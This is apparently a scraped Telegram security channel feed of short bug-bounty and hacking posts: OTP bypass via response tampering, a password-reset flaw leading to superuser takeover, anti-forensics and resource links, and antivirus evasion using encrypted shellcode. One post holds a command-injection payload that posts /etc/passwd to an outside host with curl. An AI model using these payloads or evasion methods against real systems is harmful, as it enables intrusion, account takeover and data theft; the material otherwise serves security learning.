UNDERCODE TESTING
314 subscribers
311 photos
24 videos
173 files
29.9K links
๐Ÿฆ‘ World first platform which Collect & Analyzes every New hacking method.

+ Free AI Practice.

(New Bug Bounty Methods, Tools Updates, AI & Courses).

โœจ Services: Undercode.help/services

โœจyoutube.com/undercode

@Undercode_Testing
Download Telegram
๐Ÿฆ‘Broken Access Control: From Password Reset to Mass Account Takeover

A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereโ€™s how it unfolded:

1๏ธโƒฃ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2๏ธโƒฃ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3๏ธโƒฃ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4๏ธโƒฃ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5๏ธโƒฃ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.

๐ŸŽฏ Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.

Ref: Amit Kumar
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Anti Forensic Techniques Repositories #1

Anti Forensic Techniques
https://lnkd.in/dWmF3ikg

Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6

Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb

Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2

Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m

Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx

AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR

Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz

Ref: Joas A Santos
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Awesome Security - A collection of awesome software, libraries, documents, books, and resources about security.

๐Ÿ”—https://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.

๐Ÿ”—https://lnkd.in/d3kxd9ik

โญ•๏ธAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.

๐Ÿ”—https://lnkd.in/dZPtJmXV

โญ•๏ธawesome-web-hacking - Resources for learning about web application security.

๐Ÿ”—https://lnkd.in/dqmeXsgj

โญ•๏ธawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.

๐Ÿ”—https://lnkd.in/dbbvfeYT

โญ•๏ธawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.

๐Ÿ”—https://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.

๐Ÿ”—https://lnkd.in/de_PyRxH
security-hardening

โญ•๏ธAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.

๐Ÿ”—https://lnkd.in/dXztUHKk

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘OTP Bypass on Register account via Response manipulation:

1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.

Impact: Account Takeover

2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.

Ref: Het Vikam
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Bypass Login Prompts on Instagram & Pinterest! #OSINT

๐Ÿ” #OSINT Protip 9 by KartikHunt3r:
If you didnโ€™t know about this trick before, you should now! Thereโ€™s a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.

๐Ÿ“Œ Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.

๐Ÿ’ก This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesโ€”enhancing your digital investigation skills! ๐Ÿš€

๐Ÿ’ฌ Found this tip helpful? Like, share, and follow for more OSINT hacks!

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘Live Bug Bounty :

Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! ๐ŸŒŸ In todayโ€™s video, weโ€™re diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).

๐ŸŒŸ What Youโ€™ll Learn in This Video
1๏ธโƒฃ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2๏ธโƒฃ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.

Ref: Rohith S.
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘POC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.

02: I add this for getting the server location and other information. I replace with my Burp collaborator:

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)

04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"

05: In Burp collaborator, I can see the server's /etc/passwd file.

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘๐…๐‘๐„๐„ ๐‘๐„๐’๐Ž๐”๐‘๐‚๐„๐’ - ๐๐‹๐€๐‚๐Š ๐‡๐ˆ๐‹๐‹๐’ ๐ˆ๐๐…๐Ž๐‘๐Œ๐€๐“๐ˆ๐Ž๐ ๐’๐„๐‚๐”๐‘๐ˆ๐“๐˜

Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.

๐Ÿ‘‰ ๐—•๐—จ๐—œ๐—Ÿ๐—— ๐—ฌ๐—ข๐—จ๐—ฅ ๐—›๐—ข๐— ๐—˜ ๐—Ÿ๐—”๐—•
๐ŸŒŸ How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS

๐Ÿ‘‰ ๐—ก๐—˜๐—ง๐—ช๐—ข๐—ฅ๐—ž ๐—ฆ๐—˜๐—–๐—จ๐—ฅ๐—œ๐—ง๐—ฌ
๐ŸŒŸ Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ

๐Ÿ‘‰ ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง๐—œ๐—ก๐—š
๐ŸŒŸ Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0

๐ŸŒŸ Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK

๐Ÿ‘‰ ๐—ช๐—˜๐—• ๐—”๐—ฃ๐—ฃ๐—Ÿ๐—œ๐—–๐—”๐—ง๐—œ๐—ข๐—ก ๐—”๐—ก๐—— ๐—•๐—จ๐—ฅ๐—ฃ ๐—ฆ๐—จ๐—œ๐—ง๐—˜
๐ŸŒŸ Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP

๐ŸŒŸ Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ

๐ŸŒŸ Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW

๐Ÿ‘‰ ๐—œ๐— ๐—ฃ๐—ฅ๐—ข๐—ฉ๐—˜ ๐—ฌ๐—ข๐—จ๐—ฅ ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง ๐—ฅ๐—˜๐—ฃ๐—ข๐—ฅ๐—ง๐—ฆ
๐ŸŒŸ Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV

๐Ÿ‘‰ ๐—ฅ๐—˜๐—— ๐—ง๐—˜๐—”๐— ๐—œ๐—ก๐—š
๐ŸŒŸ Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2

๐ŸŒŸ OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN

๐Ÿ‘‰ ๐—–๐—Ÿ๐—ข๐—จ๐—— ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง
๐ŸŒŸ Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI

๐ŸŒŸ Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ

๐ŸŒŸ Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY

๐Ÿ‘‰ ๐—ช๐—˜๐—•๐Ÿฏ
๐ŸŒŸ Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO

๐ŸŒŸ Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT

๐Ÿ‘‰ ๐—๐—ข๐—• ๐—›๐—จ๐—ก๐—ง๐—œ๐—ก๐—š
๐ŸŒŸ How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX

๐ŸŒŸ Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1

๐Ÿ‘‰ ๐—•๐—ข๐—ก๐—จ๐—ฆ
๐ŸŒŸ Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU

Post Credit : Gabrielle
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘The Ultimate IDOR Testing Checklist!

Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.

This comprehensive list covers everything from:
โœ… Testing parameter pollution
โœ… Exploring API versions and extensions
โœ… Swapping GUIDs with numeric IDs
โœ… Bypassing 403/401 responses
โœ… Blind IDORs and chaining with XSS for account takeovers

Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.

Ref: Amit Kumar
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
SIMULATION FOR
CYBERSECURITY
ANALYST POSITION.pdf
238 KB
๐Ÿฆ‘"Interview Simulation For Cybersecurity Analyst Position (L1, L2, L3) From Various Background Complete With ATS Resume Examples". In this document, I have prepared six different career backgrounds for individuals seeking a cybersecurity analyst role, whether they are transitioning from another field or moving from L1 to L2 or L3 positions. Additionally, I have provided interview simulations for each job application, along with tailored ATS-optimised resumes.
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘User Automation Process Using CSV:

1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.

Mossad Hamady
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Ngrok โ€“ Simplified Tunneling.

ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.

๐Ÿ”‘ What Makes Ngrok a Must-Have Tool?

1๏ธโƒฃ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.

2๏ธโƒฃ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.

3๏ธโƒฃ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.

4๏ธโƒฃ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.

5๏ธโƒฃ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether itโ€™s a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.

๐Ÿ”ง How to Get Started with Ngrok

1๏ธโƒฃ Install Ngrok

Download and install Ngrok from the official website:
๐Ÿ‘‰ https:// ngrok.com /download

For Linux, run:

sudo apt install ngrok

2๏ธโƒฃ Sign Up for Free or Pro Plan

Ngrokโ€™s free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.

3๏ธโƒฃ Expose Your Local Server

Run your local app (e.g., on port 5000):

python -m http.server 5000

Start the Ngrok tunnel:

ngrok http 5000

Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!

๐ŸŒ When You Need a Public IP

Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, youโ€™ll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.

Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.

For example:

โ€ข If youโ€™re delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
โ€ข AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.

Have you used AWS servers or Ngrok in your pentesting or development setups? ๐Ÿš€

Andrew P.
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘ Just Released: A comprehensive Active Directory threat hunting tool that makes detecting suspicious activities easier than ever!

โœจ Key Features:
โ€ข Real-time attack detection
โ€ข Advanced timing analysis
โ€ข Pattern recognition
โ€ข Multi-format reporting (CSV/JSON/HTML)
โ€ข Built-in attack simulation

๐Ÿ” Detects:
โ€ข Password spray attacks
โ€ข Brute force attempts
โ€ข Account lockouts
โ€ข Off-hours activity
โ€ข Geographically impossible logins
โ€ข Service account misuse
โ€ข Admin account abuse

โšก๏ธ Smart Analysis:
โ€ข Time-based attack correlation
โ€ข Activity pattern matching
โ€ข User behavior analysis
โ€ข Configurable business hours
โ€ข Customizable thresholds

๐Ÿงช Includes Test Framework:
โ€ข Simulate various attack scenarios
โ€ข Validate detection capabilities
โ€ข Test environment readiness
โ€ข Verify audit policies

๐Ÿš€ Get started: https://lnkd.in/gbuaaswB

Michael H.
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
WIN_fhacking.pdf
522.6 KB
๐Ÿฆ‘๐‘พ๐’Š๐’๐’…๐’๐’˜๐’” ๐‘ณ๐’๐’ˆ๐’ˆ๐’Š๐’๐’ˆ ๐‘ช๐’‰๐’†๐’‚๐’• ๐‘บ๐’‰๐’†๐’†๐’• ๐Ÿ›ก

Effective logging is the cornerstone of a robust security posture. This "Windows Logging Cheat Sheet" is designed to guide you in setting up essential Windows ๐€๐ฎ๐๐ข๐ญ ๐๐จ๐ฅ๐ข๐œ๐ข๐ž๐ฌ and ๐‹๐จ๐ ๐ ๐ข๐ง๐  to kickstart your Log Management Program.
๐Ÿฆ‘Critical Security Bug in Meta Ecosystem โ€“ Zero-Click Account Takeover ๐Ÿ”’

As cybersecurity researchers, my buddy Musawer Khan and I uncovered a Zero-Click Account Takeover (ATO) vulnerability in Meta's ecosystem. This vulnerability involved chaining two endpointsโ€”one being a password reset URL that was indexed on platforms like URLScan and Wayback Machine. These URLs should ideally expire after a reasonable timeframe, yet they remained active and exploitable.

Impact:
1. Without requiring any user interaction (zero-click), we were able to gain unauthorized access to multiple accounts by chaining an endpoint and a password reset link.
2. This demonstrates a serious flaw in how reset links are managed, as they should expire promptly to mitigate potential misuse.

Despite providing a detailed proof-of-concept (PoC) showcasing the exploit, Meta Meta Facebook security team declined to classify this as a vulnerability under their bug bounty program, stating that the URLs were publicly exposed before indexing. However, the persistence of these sensitive URLs and the ability to exploit them points to a systemic issue.

Our Responsibility:
As responsible researchers, Musawer Khan and I ensured that all live URLs were expired from our side before disclosing the findings publicly. Our goal is to raise awareness about the importance of securing password reset mechanisms and ensuring that sensitive URLs are time-bound and properly invalidated.

Key Takeaways:
Password reset URLs should automatically expire after a short duration or after first use.


Mohaseen Katika
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
This media is not supported in your browser
VIEW IN TELEGRAM
Security Bug in Meta Ecosystem โ€“ Zero-Click Account Takeover
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘ Evade Kaspersky Total Security and Trend Micro Maximum Security and Windows Defender, tested on Windows 10 & 11. Using the following techniques.

๐Ÿ’กLoad custom DLL (API.dll) to obfuscate API calls.

๐Ÿ’กAES encryption to obfuscate shellcode

๐Ÿ’กDecrypt shellcode in memory to prevent static detection

๐Ÿ’กAllocate & execute shellcode with VirtualProtect to bypass memory protection